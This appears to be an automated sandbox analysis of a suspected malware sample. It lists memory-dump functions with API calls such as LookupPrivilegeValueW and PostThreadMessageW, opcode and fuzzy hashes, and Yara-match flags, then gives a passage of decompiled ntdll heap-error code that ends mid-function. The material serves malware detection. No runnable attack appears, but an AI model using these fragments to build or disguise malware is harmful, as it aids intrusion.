Function 019099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019099AA

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 188740bb10c8bdd9704e036ca326b35bbc3f347c331ba9359892aef1fd370193
Instruction ID: 6befce72e1a005e1151178349126a6027a2e905308c48b8b816d39ecbad1cd29
Opcode Fuzzy Hash: 188740bb10c8bdd9704e036ca326b35bbc3f347c331ba9359892aef1fd370193
Instruction Fuzzy Hash: 7F9002A174111842D10061994518B064485E7E1341F51C415E1094554DC659CC927166

Uniqueness

Uniqueness Score: -1.00%

Function 01909910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0190991A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4c99b3aedc13f93d0f1eed9aa9e330989ff3a57bdabfab2632bdfedfa9f4c79
Instruction ID: 4ed4b2e696e3b054347c36bb4e5e6aa93e30e73566c12926017605af8c7265fa
Opcode Fuzzy Hash: b4c99b3aedc13f93d0f1eed9aa9e330989ff3a57bdabfab2632bdfedfa9f4c79
Instruction Fuzzy Hash: DC9002B160111802D140719945087464485A7D0341F51C411A5094554EC6998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 019098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019098FA

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a12fc05de551f4da9905f24f62c7bb164c7bb12bdf5a0f58fb3c93a33b4a69b
Instruction ID: 18c9dbb1e655e823f4f99a05ba59f6bc5252faa6e4457a646c20920b1ce9e474
Opcode Fuzzy Hash: 2a12fc05de551f4da9905f24f62c7bb164c7bb12bdf5a0f58fb3c93a33b4a69b
Instruction Fuzzy Hash: F6900261A0111902D10171994508616448AA7D0281F91C422A1054555ECA6589D2B171

Uniqueness

Uniqueness Score: -1.00%

Function 01909840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0190984A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 171543a8cffdea43c9b8d27b9f48bb6d9f1c9931bd3ad07a5e5ef50ad58c1166
Instruction ID: 1b399d0248980794ec1511d5047d54b9f34999ac7b11149df8e44032074c1c3b
Opcode Fuzzy Hash: 171543a8cffdea43c9b8d27b9f48bb6d9f1c9931bd3ad07a5e5ef50ad58c1166
Instruction Fuzzy Hash: 28900261642155525545B19945085078486B7E0281791C412A1444950CC5669896E661

Uniqueness

Uniqueness Score: -1.00%

Function 01909860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0190986A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b5dadd9516d9fffd5aea47656bf13c3099382c014c0d6aec93a133c690fb7b3
Instruction ID: ad43b1f36d1876544874a0b64382f150e3ab1c3010645c310fae1799de04f18f
Opcode Fuzzy Hash: 6b5dadd9516d9fffd5aea47656bf13c3099382c014c0d6aec93a133c690fb7b3
Instruction Fuzzy Hash: 1A90027160111813D111619946087074489A7D0281F91C812A0454558DD6968992B161

Uniqueness

Uniqueness Score: -1.00%

Function 01909A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01909A0A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f09b446c70e9a5dfd98f57298289482b3c579f24b67d227c3af6d1883487143
Instruction ID: fd7cae6f06a17e9badc1f8cda75bb97ae8b2bd746ff868777d0f026bfb6ce687
Opcode Fuzzy Hash: 2f09b446c70e9a5dfd98f57298289482b3c579f24b67d227c3af6d1883487143
Instruction Fuzzy Hash: 7F90027160151802D1006199491870B4485A7D0342F51C411A1194555DC665889175B1

Uniqueness

Uniqueness Score: -1.00%

Function 01909A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01909A2A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5eec64519dbc8dbf2967b4f2f60cc4f95f3086f4fe7c8b9813f4a5128cb57236
Instruction ID: 89a33da211557f82dcc4110ce2b520068294f959dea6898249dff3d7a1f698af
Opcode Fuzzy Hash: 5eec64519dbc8dbf2967b4f2f60cc4f95f3086f4fe7c8b9813f4a5128cb57236
Instruction Fuzzy Hash: AA900261A0111442414071A989489068485BBE1251751C521A09C8550DC59988A566A5

Uniqueness

Uniqueness Score: -1.00%

Function 01909A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01909A5A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75b08a8ed2eeceab9b43c6c54e0dbe8fc41c82f0e50065b71c80724a28d92beb
Instruction ID: 86b35faf2e948647021610cb80e086fc67fb853d0d2685c4febd5ba10812d91c
Opcode Fuzzy Hash: 75b08a8ed2eeceab9b43c6c54e0dbe8fc41c82f0e50065b71c80724a28d92beb
Instruction Fuzzy Hash: CA90026161191442D20065A94D18B074485A7D0343F51C515A0184554CC95588A16561

Uniqueness

Uniqueness Score: -1.00%

Function 019095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019095DA

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2ecf7dbef6bc59292c7357b03ffce2ae4fcac3c620d73876e0d4bf626189967
Instruction ID: d84b4f58842328aa849efaca4f637f7621a8d94bb4c0945e25521295e5266516
Opcode Fuzzy Hash: d2ecf7dbef6bc59292c7357b03ffce2ae4fcac3c620d73876e0d4bf626189967
Instruction Fuzzy Hash: E69002A160211403410571994518616848AA7E0241B51C421E1044590DC56588D17165

Uniqueness

Uniqueness Score: -1.00%

Function 01909540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0190954A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92e6816c84fd72131138588ac3e4640910472bf1537dea2a988ee7285909bd4e
Instruction ID: cd15b7a2f725d8347d3eea44940d2544e4d703140d81b7ec188c04269e0ec56e
Opcode Fuzzy Hash: 92e6816c84fd72131138588ac3e4640910472bf1537dea2a988ee7285909bd4e
Instruction Fuzzy Hash: 42900265611114030105A599070850744C6A7D5391351C421F1045550CD66188A16161

Uniqueness

Uniqueness Score: -1.00%

Function 01909780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0190978A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d0501b36f3c7381cedf55c0939eceb6b13d0a21f9d629800752a308a17d4e9cb
Instruction ID: 8c23978e907e30e3d9009320aa07bfe20be7d5638bfa8e27ff6ef943e8c471b4
Opcode Fuzzy Hash: d0501b36f3c7381cedf55c0939eceb6b13d0a21f9d629800752a308a17d4e9cb
Instruction Fuzzy Hash: 1690026961311402D1807199550C60A4485A7D1242F91D815A0045558CC95588A96361

Uniqueness

Uniqueness Score: -1.00%

Function 019097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019097AA

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 682ffe1f495045a53397379a4ef01beb3ea5c31c482d6ac75f758c0e99fb8cd7
Instruction ID: f15dc0a1afcccc61feaddef1aed8eed84a037cb34fb62c968676dfe398e34f5a
Opcode Fuzzy Hash: 682ffe1f495045a53397379a4ef01beb3ea5c31c482d6ac75f758c0e99fb8cd7
Instruction Fuzzy Hash: CB90026170111403D1407199551C6068485F7E1341F51D411E0444554CD95588966262

Uniqueness

Uniqueness Score: -1.00%

Function 01909FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01909FEA

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d285fca7370e6b7131a487e6a02bb4e7a36e038d991c061950150bc18d48ea26
Instruction ID: 0df5bc48647e4a065aea9cf8d83a70907e76aebb429ae4ad9bbc4ec93b473859
Opcode Fuzzy Hash: d285fca7370e6b7131a487e6a02bb4e7a36e038d991c061950150bc18d48ea26
Instruction Fuzzy Hash: 2690027171125802D110619985087064485A7D1241F51C811A0854558DC6D588D17162

Uniqueness

Uniqueness Score: -1.00%

Function 01909710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0190971A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e9e76fb9f41cfd8c5646efd92f74a42cf8a2ee7fdcd0111acff8154542188ab
Instruction ID: 5f7af6e29be13293fddaf2b78f70983c663afa4b83aa58af12cf95ad84f6dc72
Opcode Fuzzy Hash: 5e9e76fb9f41cfd8c5646efd92f74a42cf8a2ee7fdcd0111acff8154542188ab
Instruction Fuzzy Hash: 7290027160111802D10065D9550C6464485A7E0341F51D411A5054555EC6A588D17171

Uniqueness

Uniqueness Score: -1.00%

Function 019096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019096EA

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7bb98f2ed3fd4203b37269f667c2966aa0dc1f4fe975f5e65082ed8286c35a1
Instruction ID: f7d8f3b961b29672c3d4d97361bc2ada5dfbabbe0446c8fc29a26f98911bdbfc
Opcode Fuzzy Hash: c7bb98f2ed3fd4203b37269f667c2966aa0dc1f4fe975f5e65082ed8286c35a1
Instruction Fuzzy Hash: 6A90027160119C02D1106199850874A4485A7D0341F55C811A4454658DC6D588D17161

Uniqueness

Uniqueness Score: -1.00%

Function 01909660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0190966A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a90b0cf16f1b0bf4ddc1efd452fc251d6523354df3a3916089644a8a48959ca
Instruction ID: 376900292ab06b0b3b39b0de8ccb88452178784cdb9a038201b57e6ae89245bb
Opcode Fuzzy Hash: 1a90b0cf16f1b0bf4ddc1efd452fc251d6523354df3a3916089644a8a48959ca
Instruction Fuzzy Hash: E490027160111C02D1807199450864A4485A7D1341F91C415A0055654DCA558A9977E1

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00407233, Relevance: 1.6, APIs: 1, Instructions: 52threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: dae3e050702505572084c7515291adece590f8ffdea76a93db076fdd068769d7
Instruction ID: 42275ec1bbdd9107008e24805d0d1c1df7da78bfa1576cb43f9b0864f1bdbc18
Opcode Fuzzy Hash: dae3e050702505572084c7515291adece590f8ffdea76a93db076fdd068769d7
Instruction Fuzzy Hash: 4B017D32E4161477D720A9A56C43FFA73589B00B11F5801AFFE0CFB3C1E6696D0582D6

Uniqueness

Uniqueness Score: -1.00%

Function 004185D5, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 40c3feda1a0090b62ef2a2e4fc792ab9fdb08d198427710ded3ced6e77b51b31
Instruction ID: 9526831faa348651f2484f90e7168772543a8e34bcaec901cdf911bad1e22b48
Opcode Fuzzy Hash: 40c3feda1a0090b62ef2a2e4fc792ab9fdb08d198427710ded3ced6e77b51b31
Instruction Fuzzy Hash: F2017CB52002086FDB14EF59DC81DEB73A9AF89344F118519FD4897342CA31E811CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 004072E3, Relevance: 1.5, APIs: 1, Instructions: 48threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0e510526a822c27e4e5420c908410d0eb3a79bf92e8f0f1666aa0ba59499d36b
Instruction ID: fac4ecfdd03cfaffe3467678bf3474436e2a865f0ca8206eb13de90e01009138
Opcode Fuzzy Hash: 0e510526a822c27e4e5420c908410d0eb3a79bf92e8f0f1666aa0ba59499d36b
Instruction Fuzzy Hash: AAF02831A4162876EB106A809C02FFF76189B40B15F1542AFFE04BE2C2D6BC7D4547EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 3214013f66299b9ec9659f2cf2444aab677b4a7a88e144fb66d458a9ec8bc226
Instruction ID: bf59ea738fe121061337fae3b95696833655653364d8b0cac5f8001011917114
Opcode Fuzzy Hash: 3214013f66299b9ec9659f2cf2444aab677b4a7a88e144fb66d458a9ec8bc226
Instruction Fuzzy Hash: 10F03075200104AFCB20DF55CCC5EDB776AEF89354F108659F90997346CA35E802CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418502, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1c4cc6f8cc0e93b3c838202e3c57c0338ed1b98d18bfe31162352ff5644ddf1d
Instruction ID: eccf089e1a1bc705cc3b456848f8173232ab1a7a121b49f52e112349bbe0fbc4
Opcode Fuzzy Hash: 1c4cc6f8cc0e93b3c838202e3c57c0338ed1b98d18bfe31162352ff5644ddf1d
Instruction Fuzzy Hash: 05E0DF34201314BBD320DF54CC81FCB3B589F09644F01845CB9085B242C671AA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0190967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01909694

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b866238059ea987c87fbde005b3ce07cfecbf5d29b40090983b91480dd07f7f6
Instruction ID: 8764428a2269814ecaa2e079fe18b5f661e492a73cc23fb58632b5106653bdaa
Opcode Fuzzy Hash: b866238059ea987c87fbde005b3ce07cfecbf5d29b40090983b91480dd07f7f6
Instruction Fuzzy Hash: 69B09B72D015D5C9D612D7A44B0C7177D4477D0745F16C551D10A0645F8778C0D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0197B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** enter .cxr %p for the context, xrefs: 0197B50D
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0197B47D
read from, xrefs: 0197B4AD, 0197B4B2
The instruction at %p referenced memory at %p., xrefs: 0197B432
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0197B476
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0197B314
The instruction at %p tried to %s , xrefs: 0197B4B6
The resource is owned exclusively by thread %p, xrefs: 0197B374
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0197B323
a NULL pointer, xrefs: 0197B4E0
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0197B2F3
*** then kb to get the faulting stack, xrefs: 0197B51C
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0197B53F
*** enter .exr %p for the exception record, xrefs: 0197B4F1
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0197B484
an invalid address, %p, xrefs: 0197B4CF
write to, xrefs: 0197B4A6
*** Resource timeout (%p) in %ws:%s, xrefs: 0197B352
*** An Access Violation occurred in %ws:%s, xrefs: 0197B48F
<unknown>, xrefs: 0197B27E, 0197B2D1, 0197B350, 0197B399, 0197B417, 0197B48E
*** Inpage error in %ws:%s, xrefs: 0197B418
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0197B38F
Go determine why that thread has not released the critical section., xrefs: 0197B3C5
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0197B3D6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0197B39B
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0197B305
The critical section is owned by thread %p., xrefs: 0197B3B9
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0197B2DC
This failed because of error %Ix., xrefs: 0197B446
The resource is owned shared by %d threads, xrefs: 0197B37E

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 0de6c4032185c1750bcf8fd073d4f3c12bed6fedba7da1169613c585ab610a08
Instruction ID: 2d26f67ee63cb69d830ac7d65b47f273b1105cccdf5be62b88c5804c033e3530
Opcode Fuzzy Hash: 0de6c4032185c1750bcf8fd073d4f3c12bed6fedba7da1169613c585ab610a08
Instruction Fuzzy Hash: 95811835A01200FFEB259A4ACCC5DBB3F29EF96B56F454048F90E6B312D3659641C772

Uniqueness

Uniqueness Score: -1.00%

Function 01981C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01981C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018CB150();
				} else {
					E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x19b589c);
				E018CB150("Heap error detected at %p (heap handle %p)\n",  *0x19b58a0);
				_t27 =  *0x19b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01981E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018CB150();
				} else {
					E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E018CB150("Error code: %d - %s\n",  *0x19b5898);
				_t113 =  *0x19b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Parameter1: %p\n",  *0x19b58a4);
				}
				_t115 =  *0x19b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
